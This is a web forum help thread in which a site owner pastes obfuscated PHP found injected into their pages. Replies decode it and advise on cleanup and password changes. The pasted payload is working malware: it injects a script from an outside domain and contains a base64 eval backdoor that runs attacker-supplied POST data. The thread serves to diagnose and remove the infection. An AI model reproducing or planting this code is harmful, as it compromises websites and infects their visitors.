Hi experts, I need your advice on this issue as my webpages are reacting strange. Some code automatically get added on uploading the files on server. <?php eval(base64_decode('aWYoIWZ1bmN0aW9uX2V4aXN0cygndXEyJykpe2Z1bmN0aW9uIHVxMigkcyl7aWYocHJlZ19tYXRjaF9hbGwoJyM8c2NyaXB0KC4qPyk8L3NjcmlwdD4jaXMnLCRzLCRhKSlmb3JlYWNoKCRhWzBdYXMkdilpZihjb3VudChleHBsb2RlKCJcbiIsJHYpKT41KXskZT1wcmVnX21hdGNoKCcjW1wnIl1bXlxzXCciXC4sO1w/IVxbXF06Lzw+XChcKV17MzAsfSMnLCR2KXx8cHJlZ19tYXRjaCgnI1tcKFxbXShccypcZCssKXsyMCx9IycsJHYpO2lmKChwcmVnX21hdGNoKCcjXGJldmFsXGIjJywkdikmJigkZXx8c3RycG9zKCR2LCdmcm9tQ2hhckNvZGUnKSkpfHwoJGUmJnN0cnBvcygkdiwnZG9jdW1lbnQud3JpdGUnKSkpJHM9c3RyX3JlcGxhY2UoJHYsJycsJHMpO31pZihwcmVnX21hdGNoX2FsbCgnIzxpZnJhbWUgKFtePl0qPylzcmM9W1wnIl0/KGh0dHA6KT8vLyhbXj5dKj8pPiNpcycsJHMsJGEpKWZvcmVhY2goJGFbMF1hcyR2KWlmKHByZWdfbWF0Y2goJyNbXC4gXXdpZHRoXHMqPVxzKltcJyJdPzAqWzAtOV1bXCciPiBdfGRpc3BsYXlccyo6XHMqbm9uZSNpJywkdikmJiFzdHJzdHIoJHYsJz8nLic+JykpJHM9cHJlZ19yZXBsYWNlKCcjJy5wcmVnX3F1b3RlKCR2LCcjJykuJy4qPzwvaWZyYW1lPiNpcycsJycsJHMpOyRzPXN0cl9yZXBsYWNlKCRhPWJhc2U2NF9kZWNvZGUoJ1BITmpjbWx3ZENCemNtTTlhSFIwY0RvdkwzWmhjMkZwYTJGeUxtOXlaeTl0WVcxaWIzUnpMM05sWVhKamFDNXdhSEFnUGp3dmMyTnlhWEIwUGc9PScpLCcnLCRzKTtpZihzdHJpc3RyKCRzLCc8Ym9keScpKSRzPXByZWdfcmVwbGFjZSgnIyhccyo8Ym9keSkjbWknLCRhLidcMScsJHMsMSk7ZWxzZWlmKHN0cnBvcygkcywnPGEnKSkkcz0kYS4kcztyZXR1cm4kczt9ZnVuY3Rpb24gdXEyMigkYSwkYiwkYywkZCl7Z2xvYmFsJHVxMjE7JHM9YXJyYXkoKTtpZihmdW5jdGlvbl9leGlzdHMoJHVxMjEpKWNhbGxfdXNlcl9mdW5jKCR1cTIxLCRhLCRiLCRjLCRkKTtmb3JlYWNoKEBvYl9nZXRfc3RhdHVzKDEpYXMkdilpZigoJGE9JHZbJ25hbWUnXSk9PSd1cTInKXJldHVybjtlbHNlaWYoJGE9PSdvYl9nemhhbmRsZXInKWJyZWFrO2Vsc2Ukc1tdPWFycmF5KCRhPT0nZGVmYXVsdCBvdXRwdXQgaGFuZGxlcic/ZmFsc2U6JGEpO2ZvcigkaT1jb3VudCgkcyktMTskaT49MDskaS0tKXskc1skaV1bMV09b2JfZ2V0X2NvbnRlbnRzKCk7b2JfZW5kX2NsZWFuKCk7fW9iX3N0YXJ0KCd1cTInKTtmb3IoJGk9MDskaTxjb3VudCgkcyk7JGkrKyl7b2Jfc3RhcnQoJHNbJGldWzBdKTtlY2hvICRzWyRpXVsxXTt9fX0kdXEybD0oKCRhPUBzZXRfZXJyb3JfaGFuZGxlcigndXEyMicpKSE9J3VxMjInKT8kYTowO2V2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbJ2UnXSkpOw==')); ?> PHP: Please, help me as I have no idea of this. I am new to php...
When i decoded it seems its got some iframe codes seems like some hacker has added those codes u need to remove it manually and change pass
On decoding, it will result into <script src=http://vasaikar.org/mambots/search.php ></script> HTML: which gives 404. Do you think changing password will be enough and which passwords (FTP/database) are to be changed???
Not just changing, in fact you shouldn't save password in FTP softwares (if you saved). More info @ How To Completely Remove All Malicious Iframes on Your Website
http://google.com/safebrowsing/diagnostic?site=AS:13332 Has this network hosted sites that have distributed malware? Yes, this network has hosted sites that have distributed malicious software in the past 90 days. We found 3 site(s), including, for example, vasaikar.org/, kk6.us/, stat-google.com/, that infected 158 other site(s), including, for example, nter-hkscout.org/, backshop.co.kr/, algeria.or.kr/.
Go to Google and enter this search, replacing the capitalized text with your domain name and removing all the spaces: site: WWW . EXAMPLE . COM If a result says "This site may harm your computer", click a link to one of your site pages and follow the link to the Safe Browsing Diagnostic report.
Check all your other .php files, you may find that many or all have had this code added. Next check all installed software for updates, especially galleries. Next find which file on the server introduced this code to the current file, there will probably be 1 root file for this virus.
Someone probably got your ftp info, it happened to me a few months back. Basically you get a virus on your pc then that transmits your ftp data, that data is used to insert the code. Change all passwords, scan PC and don't store passwords in the ftp program. Also you might have a security issue with your script so update it, or make sure it's secure.
i dont think its the password problem , i translated those hack codes and find a simple fix way site-get-hacked-with-evalbase64_decode
Were you using a theme or any other script with encoded promo footer links, or anything like that. I've seen more than one occasion where someone's site was hacked because of the eval(base64 link code in the theme. This is why I always recommend not using the ever. Even if the theme creator doesn't do it, if their site gets hacked, yours does too.